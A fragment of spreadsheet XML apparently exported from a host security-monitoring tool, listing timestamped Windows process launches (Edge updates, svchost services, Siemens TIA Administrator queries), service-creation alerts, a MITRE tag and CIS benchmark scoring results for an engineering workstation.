    <t>\"C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\Install\\{76535960-46BB-4E5A-8689-A3AAA9206ECB}\\EDGEMITMP_9C38D.tmp\\setup.exe\" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\\WINDOWS\\SystemTemp\\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=136.0.7103.49 \"--annotation=exe=C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\Install\\{76535960-46BB-4E5A-8689-A3AAA9206ECB}\\EDGEMITMP_9C38D.tmp\\setup.exe\" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=136.0.3240.50 --initial-client-data=0x248,0x24c,0x250,0x230,0x254,0x7ff79742f3e8,0x7ff79742f3f4,0x7ff79742f400</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:38.538</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:38.962</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:39.862</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:39.895</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:40.078</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:40.322</t>
  </si>
  <si>
    <t>CIS Microsoft Windows 11 Enterprise Benchmark v3.0.0: Ensure 'Maximum password age' is set to '365 or fewer days, but not 0'.: Status changed from passed to 'not applicable'</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:40.709</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\136.0.3240.50\\Installer\\setup.exe\" --msedge --channel=stable --register-package-identity --verbose-logging --system-level</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:40.918</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\136.0.3240.50\\Installer\\setup.exe\" --msedge --channel=stable --remove-deprecated-packages --verbose-logging --system-level</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:40.948</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\136.0.3240.50\\Installer\\setup.exe\" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\\WINDOWS\\SystemTemp\\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=136.0.7103.49 \"--annotation=exe=C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\136.0.3240.50\\Installer\\setup.exe\" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=136.0.3240.50 --initial-client-data=0x250,0x254,0x258,0x22c,0x25c,0x7ff6a5ccf3e8,0x7ff6a5ccf3f4,0x7ff6a5ccf400</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:41.135</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\136.0.3240.50\\Installer\\setup.exe\" --msedge --channel=stable --update-game-assist-package --verbose-logging --system-level</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:41.482</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:41.530</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\136.0.3240.50\\Installer\\setup.exe\" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\\WINDOWS\\SystemTemp\\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=136.0.7103.49 \"--annotation=exe=C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\136.0.3240.50\\Installer\\setup.exe\" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=136.0.3240.50 --initial-client-data=0x258,0x25c,0x260,0x230,0x264,0x7ff6a5ccf3e8,0x7ff6a5ccf3f4,0x7ff6a5ccf400</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:41.576</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\svchost.exe -k WbioSvcGroup</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:41.588</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\136.0.3240.50\\Installer\\setup.exe\" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\\WINDOWS\\SystemTemp\\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=136.0.7103.49 \"--annotation=exe=C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\136.0.3240.50\\Installer\\setup.exe\" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=136.0.3240.50 --initial-client-data=0x254,0x258,0x25c,0x230,0x260,0x7ff6a5ccf3e8,0x7ff6a5ccf3f4,0x7ff6a5ccf400</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:43.330</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:44.254</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:44.283</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:44.514</t>
  </si>
  <si>
    <t>Special privileges assigned to new logon.</t>
  </si>
  <si>
    <t>[T1484]</t>
  </si>
  <si>
    <t>[Defense Evasion, Privilege Escalation]</t>
  </si>
  <si>
    <t>[Domain Policy Modification]</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:44.515</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\svchost.exe -k WebThreatDefense -p</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:44.535</t>
  </si>
  <si>
    <t>\"C:\\Program Files\\Siemens\\Automation\\TIAADMIN\\server\\node.exe\" \"--no-warnings\" \"C:\\Program Files\\Siemens\\Automation\\TIAADMIN\\server\\server.js\" \"--runservice\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:44.885</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\System32\\SearchProtocolHost.exe\" Global\\UsGthrFltPipeMssGthrPipe3_ Global\\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 \"Software\\Microsoft\\Windows Search\" \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\" \"C:\\ProgramData\\Microsoft\\Search\\Data\\Temp\\usgthrsvc\" \"DownLevelDaemon\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:45.203</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:46.291</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:46.909</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:47.344</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:48.685</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:49.294</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\AarSvc_29aa56\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k AarSvcGroup -p</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:49.303</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\BcastDVRUserService_29aa56\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k BcastDVRUserService</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:49.307</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\BluetoothUserService_29aa56\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k BthAppGroup -p</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\CaptureService_29aa56\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k LocalService -p</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:49.316</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\cbdhsvc_29aa56\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k ClipboardSvcGroup -p</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:49.318</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\CDPUserSvc_29aa56\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k UnistackSvcGroup</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:49.319</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\CloudBackupRestoreSvc_29aa56\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k UnistackSvcGroup</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:49.771</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\ConsentUxUserSvc_29aa56\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k DevicesFlow</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:49.776</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\CredentialEnrollmentManagerUserSvc_29aa56\\ImagePath binary is: C:\\WINDOWS\\system32\\CredentialEnrollmentManager.exe</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:50.509</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\DeviceAssociationBrokerSvc_29aa56\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k DevicesFlow -p</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:50.510</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\DevicePickerUserSvc_29aa56\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k DevicesFlow</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:50.513</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\DevicesFlowUserSvc_29aa56\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k DevicesFlow</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:50.514</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\MessagingService_29aa56\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k UnistackSvcGroup</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:50.515</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\NPSMSvc_29aa56\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k LocalService -p</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:50.516</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\OneSyncSvc_29aa56\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k UnistackSvcGroup</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:50.518</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\P9RdrService_29aa56\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k P9RdrService -p</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\PenService_29aa56\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k PenService</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:50.519</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\PimIndexMaintenanceSvc_29aa56\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k UnistackSvcGroup</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:50.526</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\PrintWorkflowUserSvc_29aa56\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k PrintWorkflow</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:50.527</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\UdkUserSvc_29aa56\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k UdkSvcGroup</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:50.528</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\UserDataSvc_29aa56\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k UnistackSvcGroup</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\UnistoreSvc_29aa56\\ImagePath binary is: C:\\WINDOWS\\System32\\svchost.exe -k UnistackSvcGroup</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:50.529</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\webthreatdefusersvc_29aa56\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k LocalSystemNetworkRestricted -p</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:50.531</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\WpnUserService_29aa56\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k UnistackSvcGroup</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:50.533</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:50.535</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:50.537</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:51.254</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:51.255</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:51.633</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:51.634</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:51.636</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:51.853</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:53.392</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:54.682</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:54.694</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:55.362</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:57.273</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:57.276</t>
  </si>
  <si>
    <t>\"C:\\Windows\\System32\\ie4uinit.exe\" -UserConfig</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:57.453</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:57.537</t>
  </si>
  <si>
    <t>SCA summary: CIS Microsoft Windows 11 Enterprise Benchmark v3.0.0: Score less than 30% (25)</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:59.315</t>
  </si>
  <si>
    <t>C:\\Windows\\System32\\ie4uinit.exe -ClearIconCache</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:22:59.470</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:02.357</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\rundll32.exe C:\\WINDOWS\\system32\\AppXDeploymentExtensions.OneCore.dll,ShellRefresh</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:03.600</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:04.463</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:05.649</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:07.834</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:08.908</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\system32\\usoclient.exe\" StartWork</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:10.133</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:11.249</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:11.255</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:11.260</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:11.717</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:11.720</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:11.801</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:11.932</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:13.217</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:13.218</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:14.061</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:14.073</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:14.371</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:16.141</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:16.165</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:16.177</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:16.180</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\sc.exe qc SiemensTiaAdmin</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:16.185</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:16.186</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\sc.exe queryex SiemensTiaAdmin</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:16.187</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\sc.exe qfailure SiemensTiaAdmin</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:16.940</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\sc.exe qsidtype SiemensTiaAdmin</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:16.941</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:16.942</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\sc.exe qprivs SiemensTiaAdmin</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:16.945</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\Install\\{DE7F6742-BB62-4E7A-B87F-A1C709D62A5F}\\MicrosoftEdgeUpdateSetup_X86_1.3.195.57.exe\" /update /sessionid \"{3DBED461-F3A2-4EAE-962A-4FC44855A5EA}\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:16.947</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:17.645</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\uus\\packages\\preview\\AMD64\\MoNotificationUx.exe /ClearActiveNotifications /CV Y7lP+c/bNEK82f5G.1.0.0</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:18.030</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\certutil.exe -verifystore Root Windows11EWS-TIAADMIN-SYSTEM</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:18.031</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\MicrosoftEdgeUpdate.exe\" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDkiIHNoZWxsX3ZlcnNpb249IjEuMy4xODUuMjciIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7M0RCRUQ0NjEtRjNBMi00RUFFLTk2MkEtNEZDNDQ4NTVBNUVBfSIgdXNlcmlkPSJ7NjlENzAzMDEtNTlDOS00MTM3LUExREYtNTM5QTUyNDkzRDFCfSIgaW5zdGFsbHNvdXJjZT0iY29yZSIgcmVxdWVzdGlkPSJ7NTY0NUYwMjItQkRBQy00RjcxLUJGQjQtMjM2RjU3MEI3MDEwfSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjQiIHBoeXNtZW1vcnk9IjIiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4yNjEwMC4zNzc1IiBzcD0iIiBhcmNoPSJ4NjQiIHByb2R1Y3RfdHlwZT0iNDgiIGlzX3dpcD0iMCIgaXNfaW5fbG9ja2Rvd25fbW9kZT0iMCIvPjxvZW0gcHJvZHVjdF9tYW51ZmFjdHVyZXI9IlZNd2FyZSwgSW5jLiIgcHJvZHVjdF9uYW1lPSJWTXdhcmUyMCwxIi8-PGV4cCBldGFnPSImcXVvdDtFK3hiQXo2WTZzVTEyODliUzZxbDRWUkxia2pmQlVHVE1Kc2pySHI0NGlJPSZxdW90OyIvPjxhcHAgYXBwaWQ9IntGM0M0RkUwMC1FRkQ1LTQwM0ItOTU2OS0zOThBMjBGMUJBNEF9IiB2ZXJzaW9uPSIxLjMuMTk1LjQ5IiBuZXh0dmVyc2lvbj0iMS4zLjE5NS41NyIgbGFuZz0iIiBicmFuZD0iSU5CWCIgY2xpZW50PSIiIGluc3RhbGxhZ2U9IjQ1IiBjb2hvcnQ9InJyZkAwLjExIj48dXBkYXRlY2hlY2svPjxldmVudCBldmVudHR5cGU9IjEyIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSIyNzY2NzY2MjM5IiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iMTMiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjI3NjczODg2NTkiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSIxNCIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iMzY4MDMzMjAwMiIgc291cmNlX3VybF9pbmRleD0iMCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIgZG93bmxvYWRlcj0iZG8iIHVybD0iaHR0cDovL21zZWRnZS5iLnRsdS5kbC5kZWxpdmVyeS5tcC5taWNyb3NvZnQuY29tL2ZpbGVzdHJlYW1pbmdzZXJ2aWNlL2ZpbGVzLzM1OGI3ZjNkLWI3YjctNDdmNS1hYmQxLWZiNjFkMTNmMGRhOD9QMT0xNzQ3MzkwOTA0JmFtcDtQMj00MDQmYW1wO1AzPTImYW1wO1A0PWlBRWtIa1pnJTJmZjNWNDduNjdidWNOVzVFdE0yY2R0TWltdTJOZ1lDdlJIWGpTVmFPNCUyZndzR0JBN09Ha01HY040MHgydzNER0hxUDBGTk5lMVVoRFU0QSUzZCUzZCIgc2VydmVyX2lwX2hpbnQ9IiIgY2RuX2NpZD0iLTEiIGNkbl9jY2M9IiIgY2RuX21zZWRnZV9yZWY9IiIgY2RuX2F6dXJlX3JlZl9vcmlnaW5fc2hpZWxkPSIiIGNkbl9jYWNoZT0iIiBjZG5fcDNwPSIiIGRvd25sb2FkZWQ9IjE2NTY5MDQiIHRvdGFsPSIxNjU2OTA0IiBkb3dubG9hZF90aW1lX21zPSI4OTAyMSIvPjxldmVudCBldmVudHR5cGU9IjE0IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSIzNjgyOTkxMDA2IiBzb3VyY2VfdXJsX2luZGV4PSIwIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iMTUiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjM2ODk4MzIzMTEiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiLz48cGluZyByPSI3IiByZD0iNjY5NiIgcGluZ19mcmVzaG5lc3M9IntDNjc2NzBERi1GQUIyLTQxODgtOUQ5Ny0xRjkyNkQ5RUM2RUR9Ii8-PC9hcHA-PGFwcCBhcHBpZD0iezU2RUIxOEY4LUIwMDgtNENCRC1CNkQyLThDOTdGRTdFOTA2Mn0iIHZlcnNpb249IjEzNS4wLjMxNzkuOTgiIG5leHR2ZXJzaW9uPSIiIGxhbmc9IiIgYnJhbmQ9IklOQlgiIGNsaWVudD0iIiBleHBlcmltZW50cz0iY29uc2VudD1mYWxzZSIgaW5zdGFsbGFnZT0iNDUiIGNvaG9ydD0icnJmQDAuOTAiIG9vYmVfaW5zdGFsbF90aW1lPSIxMzM4NzMyNzEyNjI3ODEwMTAiIHVwZGF0ZV9jb3VudD0iNCIgaXNfcGlubmVkX3N5c3RlbT0idHJ1ZSIgbGFzdF9sYXVuY2hfY291bnQ9IjEiIGxhc3RfbGF1bmNoX3RpbWU9IjEzMzkwNjUwNzY4MTgzOTAwMCI-PHVwZGF0ZWNoZWNrLz48cGluZyBhY3RpdmU9IjEiIGE9IjgiIHI9IjciIGFkPSI2Njk1IiByZD0iNjY5NiIgcGluZ19mcmVzaG5lc3M9InszQ0Q4MEU0OS1CQjdGLTQwODgtOUZCMC03RUU1N0FGOTRDMjF9Ii8-PC9hcHA-PGFwcCBhcHBpZD0ie0YzMDE3MjI2LUZFMkEtNDI5NS04QkRGLTAwQzNBOUE3RTRDNX0iIHZlcnNpb249IjEzNS4wLjMxNzkuOTgiIG5leHR2ZXJzaW9uPSIiIGxhbmc9IiIgYnJhbmQ9IklOQlgiIGNsaWVudD0iIiBleHBlcmltZW50cz0iY29uc2VudD1mYWxzZSIgaW5zdGFsbGFnZT0iNDUiIGNvaG9ydD0icnJmQDAuMjkiIHVwZGF0ZV9jb3VudD0iNCI-PHVwZGF0ZWNoZWNrLz48cGluZyByPSI3IiByZD0iNjY5NiIgcGluZ19mcmVzaG5lc3M9IntERUEyQTY0OC04RUZDLTQ4MTMtQjdEQi00QUMyREQ0NkE1NDh9Ii8-PC9hcHA-PC9yZXF1ZXN0Pg</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:19.514</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:19.515</t>
  </si>
  <si>
    <t>\"C:\\Program Files\\Siemens\\Automation\\TIAADMIN\\server\\node.exe\" --no-warnings \"C:\\Program Files\\Siemens\\Automation\\TIAADMIN\\server\\server.js\" --runfork --runservice</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:19.517</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:19.524</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:19.563</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:19.566</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:19.567</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:19.574</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:19.575</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:19.738</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:20.734</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:20.739</t>
  </si>
  <si>
    <t>taskhostw.exe SyncFromCloud</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:20.959</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:20.960</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:20.961</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:20.962</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:21.497</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:22.977</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:22.980</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:23.028</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\system32\\backgroundTaskHost.exe\" -ServerName:WindowsBackup.AppXg20mfg639r98zjt111v82s19ze9v9t09.mca</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:24.480</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:25.313</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:25.325</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:26.019</t>
  </si>
  <si>
    <t>/QuitInfo:00000000000009E4;0000000000000AB8;</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:28.495</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Temp\\EUA976.tmp\\MicrosoftEdgeUpdate.exe\" /update /sessionid \"{3DBED461-F3A2-4EAE-962A-4FC44855A5EA}\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:29.444</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\System32\\mobsync.exe -Embedding</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:31.496</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:23:31.498</t>
  </si>
  <si>
